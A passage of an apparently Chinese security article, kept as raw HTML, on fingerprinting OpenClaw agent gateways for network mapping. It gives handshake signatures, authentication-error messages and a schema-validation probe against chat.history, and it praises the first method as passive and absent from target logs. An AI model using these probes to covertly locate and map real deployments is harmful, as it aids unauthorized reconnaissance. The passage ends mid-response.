3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">payload.ts</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">毫秒级 Unix 时间戳</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">时间戳，用于防重放</span></p></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">测绘价值：</span></strong></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">100% 确认目标身份 </span></strong><span leaf="">— connect.challenge是 OpenClaw 特有的握手消息</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">完全被动</span></strong><span leaf=""> — 无需发送任何载荷，不存在误触发风险</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">无法规避</span></strong><span leaf=""> — 即使更换 WebSocket 路径，只要连接成功就会触发</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">极其隐蔽</span></strong><span leaf=""> — 不会在目标日志中留下请求记录</span></p></li></ol><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹 2</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证拒绝响应</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证要求</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">无需认证 ✅</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">探测方式</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">连接建立后发送任何缺少凭证的请求帧</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹类型</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 主动指纹（需要发送请求）</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应示例：</span></strong></p></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">缺少凭证时：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;res&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__number">1</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;ok&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__literal"><span class="code-snippet__keyword">false</span></span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;code&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__number">-32600</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;unauthorized: gateway token missing (open the dashboard URL and paste the token in Control UI settings)&#34;</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Token 位置错误时：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;invalid connect params: at /device: unexpected property &#39;token&#39; &#34;</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">特征要素：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">信息类型</span></strong></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">特征值</span></strong></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">说明</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">产品身份</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">gateway token、Control UI settings</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenClaw 特有术语</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">认证架构</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">区分 CLI 和 Control UI 场景</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">多客户端支持</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Schema 校验</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">unexpected property &#39;token&#39;</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">严格的 JSON Schema 校验</span></p></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">测绘价值：</span></strong></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认产品身份</span></strong><span leaf=""> — gateway token、Control UI settings 是 OpenClaw 特有术语</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">推断认证架构</span></strong><span leaf=""> — 区分 CLI 和 Control UI 两种客户端场景</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认 Schema 机制</span></strong><span leaf=""> — 网关使用严格的 JSON Schema 校验，且校验发生在认证之前</span></p></li></ol><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹 3</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Schema 分层校验</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证要求</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">需要认证 ⚠️（未认证状态下直接调用业务方法会被 handshake 校验拦截）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">探测方式</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">认证后，向业务方法发送包含额外字段的请求</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹类型</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主动指纹（需要认证后发送请求）</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">未认证时的响应：</span></strong></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;res&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;...&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;ok&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__literal"><span class="code-snippet__keyword">false</span></span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;code&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;INVALID_REQUEST&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;invalid handshake: first request must be connect&#34;</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证后的探测：</span></strong></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">向 chat.history 方法发送一个包含 Discord 风格 sessionKey 但掺杂了多余 agentId 字段的请求</span></p></div></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">请求：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;req&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;test-id-456&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;method&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;chat.history&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;params&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;sessionKey&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;agent:main:discord:channel:12345&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;agentId&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;main&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;limit&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__number">10</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;res&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;test-id-456&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;ok&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__literal"><span class="code-snippet__keyword">false</span></span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;code&#34;</span><span 